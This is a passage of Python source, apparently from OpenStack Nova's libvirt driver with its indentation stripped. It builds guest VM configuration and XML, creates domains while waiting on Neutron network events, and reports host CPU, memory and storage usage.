self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: " "%(error)s"),
{'uri': self.uri(), 'error': ex})
else:
raise
return self._caps
def _get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self._get_host_capabilities()
return caps.host.uuid
def _get_guest_cpu_model_config(self):
mode = CONF.libvirt.cpu_mode
model = CONF.libvirt.cpu_model
if (CONF.libvirt.virt_type == "kvm" or
CONF.libvirt.virt_type == "qemu"):
if mode is None:
mode = "host-model"
if mode == "none":
return vconfig.LibvirtConfigGuestCPU()
else:
if mode is None or mode == "none":
return None
if ((CONF.libvirt.virt_type != "kvm" and
CONF.libvirt.virt_type != "qemu")):
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt.virt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug("CPU mode '%(mode)s' model '%(model)s' was chosen",
{'mode': mode, 'model': (model or "")})
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
return cpu
def _get_guest_cpu_config(self, flavor, image):
cpu = self._get_guest_cpu_model_config()
if cpu is None:
return None
topology = hardware.VirtCPUTopology.get_best_config(flavor,
image)
cpu.sockets = topology.sockets
cpu.cores = topology.cores
cpu.threads = topology.threads
return cpu
def _get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'],
self._get_hypervisor_version())
def _get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
if CONF.libvirt.virt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self._get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self._get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self._get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self._get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
instance.default_ephemeral_device = (
block_device.prepend_dev(disklocal.target_dev))
instance.save()
for idx, eph in enumerate(
driver.block_device_info_get_ephemerals(
block_device_info)):
diskeph = self._get_guest_disk_config(
instance,
blockinfo.get_eph_disk(idx),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self._get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
instance.default_swap_device = (
block_device.prepend_dev(diskswap.target_dev))
instance.save()
for vol in block_device_mapping:
connection_info = vol['connection_info']
vol_dev = block_device.prepend_dev(vol['mount_device'])
info = disk_mapping[vol_dev]
cfg = self._connect_volume(connection_info, info)
devices.append(cfg)
vol['connection_info'] = connection_info
vol.save()
if 'disk.config' in disk_mapping:
diskconfig = self._get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
'raw')
devices.append(diskconfig)
for d in devices:
self._set_cache_mode(d)
if (image_meta and
image_meta.get('properties', {}).get('hw_scsi_model')):
hw_scsi_model = image_meta['properties']['hw_scsi_model']
scsi_controller = vconfig.LibvirtConfigGuestController()
scsi_controller.type = 'scsi'
scsi_controller.model = hw_scsi_model
devices.append(scsi_controller)
return devices
def _get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self._get_host_uuid()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def _get_guest_pci_device(self, pci_device):
dbsf = pci_utils.parse_address(pci_device['address'])
dev = vconfig.LibvirtConfigGuestHostdevPCI()
dev.domain, dev.bus, dev.slot, dev.function = dbsf
# only kvm support managed mode
if CONF.libvirt.virt_type in ('xen',):
dev.managed = 'no'
if CONF.libvirt.virt_type in ('kvm', 'qemu'):
dev.managed = 'yes'
return dev
def _get_guest_config_meta(self, context, instance, flavor):
"""Get metadata config for guest."""
meta = vconfig.LibvirtConfigGuestMetaNovaInstance()
meta.package = version.version_string_with_package()
meta.name = instance["display_name"]
meta.creationTime = time.time()
if instance["image_ref"] not in ("", None):
meta.roottype = "image"
meta.rootid = instance["image_ref"]
if context is not None:
ometa = vconfig.LibvirtConfigGuestMetaNovaOwner()
ometa.userid = context.user_id
ometa.username = context.user_name
ometa.projectid = context.project_id
ometa.projectname = context.project_name
meta.owner = ometa
fmeta = vconfig.LibvirtConfigGuestMetaNovaFlavor()
fmeta.name = flavor.name
fmeta.memory = flavor.memory_mb
fmeta.vcpus = flavor.vcpus
fmeta.ephemeral = flavor.ephemeral_gb
fmeta.disk = flavor.root_gb
fmeta.swap = flavor.swap
meta.flavor = fmeta
return meta
def _get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None,
context=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
img_meta_prop = image_meta.get('properties', {}) if image_meta else {}
CONSOLE = "console=tty0 console=ttyS0"
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt.virt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
# We are using default unit for memory: KiB
guest.memory = flavor.memory_mb * units.Ki
guest.vcpus = flavor.vcpus
guest.cpuset = hardware.get_vcpu_pin_set()
guest.metadata.append(self._get_guest_config_meta(context,
instance,
flavor))
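        # Map the quota:cpu_shares/period/quota flavor extra specs onto the
        # libvirt <cputune> element.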
cputuning = ['shares', 'period', 'quota']
for name in cputuning:
key = "quota:cpu_" + name
if key in flavor.extra_specs:
if guest.cputune is None:
guest.cputune = vconfig.LibvirtConfigGuestCPUTune()
setattr(guest.cputune, name,
int(flavor.extra_specs[key]))
guest.cpu = self._get_guest_cpu_config(flavor, image_meta)
if 'root' in disk_mapping:
root_device_name = block_device.prepend_dev(
disk_mapping['root']['dev'])
else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
instance.root_device_name = root_device_name
instance.save()
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt.virt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt.virt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt.virt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt.virt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.libvirt.xen_hvmloader_path
if CONF.libvirt.virt_type in ("kvm", "qemu"):
caps = self._get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self._get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
# The underlying machine type can be set as an image attribute,
# or otherwise based on some architecture specific defaults
if (image_meta is not None and image_meta.get('properties') and
image_meta['properties'].get('hw_machine_type')
is not None):
guest.os_mach_type = \
image_meta['properties']['hw_machine_type']
else:
# For ARM systems we will default to vexpress-a15 for armv7
# and virt for aarch64
if caps.host.cpu.arch == "armv7l":
guest.os_mach_type = "vexpress-a15"
if caps.host.cpu.arch == "aarch64":
guest.os_mach_type = "virt"
if CONF.libvirt.virt_type == "lxc":
guest.os_init_path = "/sbin/init"
guest.os_cmdline = CONSOLE
elif CONF.libvirt.virt_type == "uml":
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt.virt_type == "xen":
guest.os_cmdline = "ro root=%s" % root_device_name
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if CONF.libvirt.virt_type == "qemu":
guest.os_cmdline += " no_timer_check"
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt.virt_type == "xen":
guest.os_cmdline = "ro root=%s" % root_device_name
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if CONF.libvirt.virt_type == "qemu":
guest.os_cmdline += " no_timer_check"
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
# we only support os_command_line with images with an explicit
# kernel set and don't want to break nova if there's an
# os_command_line property without a specified kernel_id param
if image_meta:
img_props = image_meta.get('properties', {})
if img_props.get('os_command_line'):
guest.os_cmdline = img_props.get('os_command_line')
else:
guest.os_boot_dev = blockinfo.get_boot_order(disk_info)
if ((CONF.libvirt.virt_type != "lxc" and
CONF.libvirt.virt_type != "uml")):
guest.acpi = True
guest.apic = True
# NOTE(mikal): Microsoft Windows expects the clock to be in
# "localtime". If the clock is set to UTC, then you can use a
# registry key to let windows know, but Microsoft says this is
# buggy in http://support.microsoft.com/kb/2687252
clk = vconfig.LibvirtConfigGuestClock()
if instance['os_type'] == 'windows':
LOG.info(_LI('Configuring timezone for windows instance to '
'localtime'), instance=instance)
clk.offset = 'localtime'
else:
clk.offset = 'utc'
guest.set_clock(clk)
if CONF.libvirt.virt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
clk.add_timer(tmpit)
clk.add_timer(tmrtc)
arch = libvirt_utils.get_arch(image_meta)
if arch in ("i686", "x86_64"):
# NOTE(rfolco): HPET is a hardware timer for x86 arch.
# qemu -no-hpet is not supported on non-x86 targets.
tmhpet = vconfig.LibvirtConfigGuestTimer()
tmhpet.name = "hpet"
tmhpet.present = False
clk.add_timer(tmhpet)
for config in self._get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
flavor):
guest.add_device(config)
for vif in network_info:
config = self.vif_driver.get_config(
instance, vif, image_meta,
flavor, CONF.libvirt.virt_type)
guest.add_device(config)
if ((CONF.libvirt.virt_type == "qemu" or
CONF.libvirt.virt_type == "kvm")):
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.libvirt.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.libvirt.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt.virt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
add_video_driver = False
if ((CONF.vnc_enabled and
CONF.libvirt.virt_type not in ('lxc', 'uml'))):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
add_video_driver = True
if CONF.spice.enabled and \
CONF.libvirt.virt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
add_video_driver = True
if add_video_driver:
VALID_VIDEO_DEVICES = ("vga", "cirrus", "vmvga", "xen", "qxl")
video = vconfig.LibvirtConfigGuestVideo()
# NOTE(ldbragst): The following logic sets the video.type
# depending on supported defaults given the architecture,
# virtualization type, and features. The video.type attribute can
# be overridden by the user with image_meta['properties'], which
# is carried out in the next if statement below this one.
arch = libvirt_utils.get_arch(image_meta)
if guest.os_type == vm_mode.XEN:
video.type = 'xen'
elif arch in ('ppc', 'ppc64'):
                # NOTE(ldbragst): PowerKVM doesn't support 'cirrus' by default
# so use 'vga' instead when running on Power hardware.
video.type = 'vga'
elif CONF.spice.enabled:
video.type = 'qxl'
if img_meta_prop.get('hw_video_model'):
video.type = img_meta_prop.get('hw_video_model')
if (video.type not in VALID_VIDEO_DEVICES):
raise exception.InvalidVideoMode(model=video.type)
# Set video memory, only if the flavor's limit is set
video_ram = int(img_meta_prop.get('hw_video_ram', 0))
max_vram = int(flavor.extra_specs
.get('hw_video:ram_max_mb', 0))
if video_ram > max_vram:
raise exception.RequestedVRamTooHigh(req_vram=video_ram,
max_vram=max_vram)
if max_vram and video_ram:
video.vram = video_ram
guest.add_device(video)
# Qemu guest agent only support 'qemu' and 'kvm' hypervisor
if CONF.libvirt.virt_type in ('qemu', 'kvm'):
qga_enabled = False
# Enable qga only if the 'hw_qemu_guest_agent' is equal to yes
hw_qga = img_meta_prop.get('hw_qemu_guest_agent', 'no')
if hw_qga.lower() == 'yes':
LOG.debug("Qemu guest agent is enabled through image "
"metadata", instance=instance)
qga_enabled = True
if qga_enabled:
qga = vconfig.LibvirtConfigGuestChannel()
qga.type = "unix"
qga.target_name = "org.qemu.guest_agent.0"
qga.source_path = ("/var/lib/libvirt/qemu/%s.%s.sock" %
("org.qemu.guest_agent.0", instance['name']))
guest.add_device(qga)
if (img_meta_prop.get('hw_rng_model') == 'virtio' and
flavor.extra_specs.get('hw_rng:allowed',
'').lower() == 'true'):
rng_device = vconfig.LibvirtConfigGuestRng()
rate_bytes = flavor.extra_specs.get('hw_rng:rate_bytes', 0)
period = flavor.extra_specs.get('hw_rng:rate_period', 0)
if rate_bytes:
rng_device.rate_bytes = int(rate_bytes)
rng_device.rate_period = int(period)
if (CONF.libvirt.rng_dev_path and
not os.path.exists(CONF.libvirt.rng_dev_path)):
raise exception.RngDeviceNotExist(
path=CONF.libvirt.rng_dev_path)
rng_device.backend = CONF.libvirt.rng_dev_path
guest.add_device(rng_device)
if CONF.libvirt.virt_type in ('xen', 'qemu', 'kvm'):
for pci_dev in pci_manager.get_instance_pci_devs(instance):
guest.add_device(self._get_guest_pci_device(pci_dev))
else:
if len(pci_manager.get_instance_pci_devs(instance)) > 0:
raise exception.PciDeviceUnsupportedHypervisor(
type=CONF.libvirt.virt_type)
watchdog_action = flavor.extra_specs.get('hw_watchdog_action',
'disabled')
if (image_meta is not None and
image_meta.get('properties', {}).get('hw_watchdog_action')):
watchdog_action = image_meta['properties']['hw_watchdog_action']
# NB(sross): currently only actually supported by KVM/QEmu
if watchdog_action != 'disabled':
if watchdog_actions.is_valid_watchdog_action(watchdog_action):
bark = vconfig.LibvirtConfigGuestWatchdog()
bark.action = watchdog_action
guest.add_device(bark)
else:
raise exception.InvalidWatchdogAction(action=watchdog_action)
return guest
def _get_guest_xml(self, context, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
if image_meta is None:
image_ref = instance['image_ref']
image_meta = compute_utils.get_image_metadata(
context, self._image_api, image_ref, instance)
# NOTE(danms): Stringifying a NetworkInfo will take a lock. Do
# this ahead of time so that we don't acquire it while also
# holding the logging lock.
network_info_str = str(network_info)
msg = ('Start _get_guest_xml '
'network_info=%(network_info)s '
'disk_info=%(disk_info)s '
'image_meta=%(image_meta)s rescue=%(rescue)s '
'block_device_info=%(block_device_info)s' %
{'network_info': network_info_str, 'disk_info': disk_info,
'image_meta': image_meta, 'rescue': rescue,
'block_device_info': block_device_info})
# NOTE(mriedem): block_device_info can contain auth_password so we
# need to sanitize the password in the message.
LOG.debug(logging.mask_password(msg), instance=instance)
conf = self._get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info,
context)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug('End _get_guest_xml xml=%(xml)s',
{'xml': xml}, instance=instance)
return xml
def _lookup_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
dom_info = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[dom_info[0]],
'max_mem': dom_info[1],
'mem': dom_info[2],
'num_cpu': dom_info[3],
'cpu_time': dom_info[4],
'id': virt_dom.ID()}
def _create_domain_setup_lxc(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
rootfs_dev = disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
try:
# Save rootfs device to disconnect it when deleting the instance
if rootfs_dev:
instance.system_metadata['rootfs_device_name'] = rootfs_dev
instance.save()
except Exception:
with excutils.save_and_reraise_exception():
self._create_domain_cleanup_lxc(instance)
def _create_domain_cleanup_lxc(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
# The domain may not be present if the instance failed to start
state = None
if state == power_state.RUNNING:
# NOTE(uni): Now the container is running with its own private
# mount namespace and so there is no need to keep the container
# rootfs mounted in the host namespace
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0, power_on=True):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
err = None
if instance and CONF.libvirt.virt_type == 'lxc':
self._create_domain_setup_lxc(instance)
try:
if xml:
err = _LE('Error defining a domain with XML: %s') % xml
domain = self._conn.defineXML(xml)
if power_on:
err = _LE('Error launching a defined domain with XML: %s') \
% domain.XMLDesc(0)
domain.createWithFlags(launch_flags)
if not utils.is_neutron():
err = _LE('Error enabling hairpin mode with XML: %s') \
% domain.XMLDesc(0)
self._enable_hairpin(domain.XMLDesc(0))
except Exception:
with excutils.save_and_reraise_exception():
if err:
LOG.error(err)
finally:
if instance and CONF.libvirt.virt_type == 'lxc':
self._create_domain_cleanup_lxc(instance)
return domain
def _neutron_failed_callback(self, event_name, instance):
LOG.error(_LE('Neutron Reported failure on event '
'%(event)s for instance %(uuid)s'),
{'event': event_name, 'uuid': instance.uuid})
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfaceCreateException()
def _get_neutron_events(self, network_info):
# NOTE(danms): We need to collect any VIFs that are currently
# down that we expect a down->up event for. Anything that is
# already up will not undergo that transition, and for
# anything that might be stale (cache-wise) assume it's
# already up so we don't block on it.
return [('network-vif-plugged', vif['id'])
for vif in network_info if vif.get('active', True) is False]
def _create_domain_and_network(self, context, xml, instance, network_info,
block_device_info=None, power_on=True,
reboot=False, vifs_already_plugged=False):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(
CONF.libvirt.virt_type, vol)
conf = self._connect_volume(connection_info, disk_info)
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
vol['connection_info'] = connection_info
vol.save(context)
if (not reboot and 'data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
timeout = CONF.vif_plugging_timeout
if (self._conn_supports_start_paused and
utils.is_neutron() and not
vifs_already_plugged and power_on and timeout):
events = self._get_neutron_events(network_info)
else:
events = []
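        # Start the domain paused while waiting for the Neutron vif-plugged
        # events so the guest does not boot before its network is ready;
        # it is resumed below once the events have arrived.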
launch_flags = events and libvirt.VIR_DOMAIN_START_PAUSED or 0
domain = None
try:
with self.virtapi.wait_for_instance_event(
instance, events, deadline=timeout,
error_callback=self._neutron_failed_callback):
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance,
network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
domain = self._create_domain(
xml, instance=instance,
launch_flags=launch_flags,
power_on=power_on)
self.firewall_driver.apply_instance_filter(instance,
network_info)
except exception.VirtualInterfaceCreateException:
# Neutron reported failure and we didn't swallow it, so
# bail here
with excutils.save_and_reraise_exception():
if domain:
domain.destroy()
self.cleanup(context, instance, network_info=network_info,
block_device_info=block_device_info)
except eventlet.timeout.Timeout:
# We never heard from Neutron
LOG.warn(_LW('Timeout waiting for vif plugging callback for '
'instance %(uuid)s'), {'uuid': instance['uuid']})
if CONF.vif_plugging_is_fatal:
if domain:
domain.destroy()
self.cleanup(context, instance, network_info=network_info,
block_device_info=block_device_info)
raise exception.VirtualInterfaceCreateException()
# Resume only if domain has been paused
if launch_flags & libvirt.VIR_DOMAIN_START_PAUSED:
domain.resume()
return domain
def _get_all_block_devices(self):
"""Return all block devices in use on this node."""
devices = []
for dom in self._list_instance_domains():
try:
doc = etree.fromstring(dom.XMLDesc(0))
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the XML from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def _get_interfaces(self, xml):
"""Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def _get_vcpu_total(self):
"""Get available vcpu number of physical computer.
        :returns: the number of cpu cores that instances can use.
"""
if self._vcpu_total != 0:
return self._vcpu_total
try:
total_pcpus = self._conn.getInfo()[2]
except libvirt.libvirtError:
LOG.warn(_LW("Cannot get the number of cpu, because this "
"function is not implemented for this platform. "))
return 0
if CONF.vcpu_pin_set is None:
self._vcpu_total = total_pcpus
return self._vcpu_total
available_ids = hardware.get_vcpu_pin_set()
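        # The pinned CPU ids are zero-based, so the highest id must be
        # smaller than the number of physical CPUs on the host.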
if available_ids[-1] >= total_pcpus:
raise exception.Invalid(_("Invalid vcpu_pin_set config, "
"out of hypervisor cpu range."))
self._vcpu_total = len(available_ids)
return self._vcpu_total
def _get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def _get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt.images_type == 'lvm':
info = lvm.get_volume_group_info(
CONF.libvirt.images_volume_group)
elif CONF.libvirt.images_type == 'rbd':
info = LibvirtDriver._get_rbd_driver().get_pool_info()
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / units.Gi
return info
def _get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu(s) that are currently being used.
"""
total = 0
if CONF.libvirt.virt_type == 'lxc':
return total + 1
for dom in self._list_instance_domains():
try:
vcpus = dom.vcpus()
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the vpu count from domain id:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
else:
if vcpus is not None and len(vcpus) > 1:
total += len(vcpus[1])
# NOTE(gtt116): give other tasks a chance.
greenthread.sleep(0)
return total
def _get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt.virt_type == 'xen':
used = 0
for dom in self._list_instance_domains(only_guests=False):
try:
dom_mem = int(dom.info()[2])
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
# skip dom0
if dom.ID() != 0:
used += dom_mem
else:
                    # the memory reported by dom0 is greater than what
                    # it is actually using
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / units.Ki
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self._get_memory_mb_total() - avail / units.Ki
def _get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def _get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
# Trying to do be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def _get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self._conn.getHostname()
if not hasattr(self, '_hypervisor_hostname'):
self._hypervisor_hostname = hostname
elif hostname != self._hypervisor_hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hypervisor_hostname,
'new': hostname})
return self._hypervisor_hostname
def _get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self._get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def _get_cpu_info(self):
"""Get cpuinfo information.
Obtains cpu feature from virConnect.getCapabilities,
and returns as a json string.
:return: see above description
"""
caps = self._get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
